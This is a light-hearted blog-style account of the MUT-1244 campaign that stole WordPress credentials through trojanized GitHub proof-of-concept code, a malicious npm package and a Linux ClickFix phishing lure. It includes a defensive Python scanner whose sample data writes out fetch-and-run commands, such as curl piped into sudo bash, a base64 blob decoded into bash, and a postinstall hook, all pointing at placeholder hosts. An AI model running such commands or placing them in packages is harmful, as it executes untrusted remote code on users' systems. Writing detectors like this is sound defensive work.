The Great WordPress Heist: MUT-1244’s Year-Long Credential Caper

Introduction

A threat actor, whimsically dubbed MUT-1244 (short for “Mysterious Unattributed Threat”), has pulled off a heist that would make even the most seasoned cybercriminals tip their hats. Over the course of a year, this elusive entity managed to swipe over 390,000 WordPress credentials, along with SSH keys and AWS access keys, all while mining Monero cryptocurrency on the side. It’s like a digital Ocean’s Eleven, but with more coding and less George Clooney.

The Plot Unfolds

The Mastermind: MUT-1244

MUT-1244 is not your average cybercriminal. This threat actor has been meticulously orchestrating a large-scale campaign that targeted not just any victims, but other threat actors. It’s a bit like a thief robbing other thieves, which, let’s be honest, adds a certain flair to the whole operation. The campaign involved a trojanized WordPress credentials checker, which was cleverly disguised to lure in unsuspecting victims (Bleeping Computer).

The Tools of the Trade

MUT-1244’s toolkit was as sophisticated as it was sneaky. The operation involved the use of trojanized GitHub repositories, which delivered malicious proof-of-concept (PoC) exploits targeting known security flaws. These repositories were cleverly camouflaged as legitimate tools, enticing security professionals, penetration testers, and even malicious actors themselves to download and execute the payloads (The Hacker News).

But wait, there’s more! The campaign also featured a phishing component, where victims were tricked into installing a fake kernel upgrade masquerading as a CPU microcode update. This phishing tactic was particularly effective, as it played on the victims’ trust and urgency to keep their systems up to date (Security Boulevard).

The Heist in Action

The GitHub Gambit

The GitHub repositories used in this campaign were a stroke of genius. By hosting trojanized PoC code for known vulnerabilities, MUT-1244 drew in victims who were actively seeking working exploits or fixes for those flaws. One such repository, humorously named “Yet Another WordPress Poster,” served as the cover for the exfiltration of over 390,000 WordPress credentials (The Nimble Nerd).

The malicious code was hidden within an npm package, which was downloaded approximately 1,790 times before it was taken down. This package, named @0xengine/xmlrpc, was a JavaScript-based XML-RPC server and client for Node.js, adding an extra layer of deception to the operation (The Hacker News).

The Phishing Phenom

The phishing campaign was another key element of MUT-1244’s strategy. Victims received emails titled “Notification: Important CPU Microcode Update for High-Performance Computing (HPC) Users Inbox,” prompting them to install a fake kernel upgrade. This social engineering tactic, known as a ClickFix attack, was particularly novel as it targeted Linux systems, a first in the documented history of such attacks (Security Labs Datadog).

Once the victims clicked on the link, they were directed to a malicious website that instructed them to copy and paste a piece of code. This code executed a script from a GitHub repository, which then deployed a second-stage info-stealing payload. The sophistication of this phishing tactic highlights MUT-1244’s deep understanding of both technical vulnerabilities and human psychology (Security Boulevard).
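Two of the techniques above come down to the same command-line pattern: a trojanized npm package can only act if something runs its code, and the ClickFix lure works by getting a Linux user to paste a command that fetches a script from a remote repository and executes it. The following is an added example written for this article, not code from the original post, from GitHub, or from the @0xengine/xmlrpc package; the post does not describe the package's internal mechanism, so the npm part is a generic pre-install check of lifecycle hooks rather than a reconstruction. The manifest and shell-history lines are constructed samples, and all hostnames are placeholders.

```python
"""Flag 'fetch a remote script and run it' commands, in npm install hooks
and in a Linux shell history.

Added example (not from the original post or any of the projects it names).
Sample inputs below are constructed; example.invalid is a placeholder host.
"""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    source: str    # where the command was found (manifest hook or history line)
    reason: str    # which pattern fired
    command: str   # the offending command, verbatim


# Building blocks: common downloaders and shells seen in pipe-to-shell lures.
DOWNLOADER = r"\b(?:curl|wget|fetch)\b"
SHELL = r"\b(?:ba|z|da)?sh\b"

PATTERNS = [
    # curl -s https://host/x.sh | bash      (optionally via sudo)
    (re.compile(DOWNLOADER + r"[^|;&]*\|\s*(?:sudo\s+)?" + SHELL),
     "remote script piped into a shell"),
    # bash <(wget -qO- https://host/x.sh)
    (re.compile(SHELL + r"\s+<\(\s*" + DOWNLOADER),
     "remote script run via process substitution"),
    # echo <blob> | base64 -d | bash : hides the real command from the reader
    (re.compile(r"\bbase64\s+(?:-d|--decode)\b"),
     "base64 decoded at run time"),
    # node -e / python -c with inline code handed to an interpreter
    (re.compile(r"\b(?:node|python3?|perl)\s+-[ec]\b"),
     "inline code handed to an interpreter"),
]


def inspect_command(cmd: str, source: str) -> list:
    """Return one Finding per pattern that matches the command."""
    return [Finding(source, reason, cmd) for pat, reason in PATTERNS if pat.search(cmd)]


# Hooks npm runs automatically during `npm install`, with no prompt.
NPM_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def audit_manifest(manifest: dict) -> list:
    """Check the lifecycle hooks of a parsed package.json before installing it."""
    scripts = manifest.get("scripts", {})
    findings = []
    for hook in NPM_HOOKS:
        if hook in scripts:
            findings.extend(inspect_command(scripts[hook], f"package.json:{hook}"))
    return findings


def scan_shell_log(lines) -> list:
    """Check one command per line, e.g. an exported bash history."""
    findings = []
    for n, line in enumerate(lines, 1):
        findings.extend(inspect_command(line.strip(), f"history:{n}"))
    return findings


# Constructed sample manifest: a clean 'prepare' hook and a suspicious 'postinstall'.
SAMPLE_MANIFEST = {
    "name": "example-xmlrpc-client",
    "version": "1.0.0",
    "scripts": {
        "prepare": "node build.js",
        "postinstall": "curl -fsSL https://example.invalid/s.sh | bash",
    },
}

# Constructed shell history: lines 2-4 are the shapes a ClickFix page asks a
# victim to paste; lines 1 and 5 are ordinary administration.
SAMPLE_HISTORY = [
    "sudo apt update",
    'echo "Y3VybCAtcyBodHRwczovL2V4YW1wbGUuaW52YWxpZA==" | base64 -d | bash',
    "curl -s https://example.invalid/microcode.sh | sudo bash",
    "bash <(wget -qO- https://example.invalid/update.sh)",
    "ls -la /boot",
]

if __name__ == "__main__":
    for f in audit_manifest(SAMPLE_MANIFEST) + scan_shell_log(SAMPLE_HISTORY):
        print(f"{f.source}: {f.reason}: {f.command}")
```

Run against real data, `audit_manifest` would take the parsed `package.json` of a tarball fetched with `npm pack` before anything is installed, and `scan_shell_log` would take `~/.bash_history` or the reconstructed command lines from an EDR or auditd feed. The base64 rule is deliberately broad: an encoded blob in a paste-this-command lure exists precisely so the reader cannot see what it does, which is worth a look even when it turns out to be benign.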

The Aftermath

The Impact

The impact of MUT-1244’s campaign is significant. With over 390,000 WordPress credentials compromised, along with SSH keys and AWS access keys, the potential for further exploitation is vast. The victims, believed to include red teamers, penetration testers, and security researchers, now face the daunting task of securing their systems and mitigating any potential damage (Bleeping Computer).

The Response

In response to this audacious heist, GitHub has removed the malicious repositories, and security researchers are working tirelessly to unravel the full extent of the operation. The cybersecurity community is on high alert, with experts urging users to exercise caution when downloading PoC code and to verify the authenticity of any updates or patches before installation (The Hacker News).
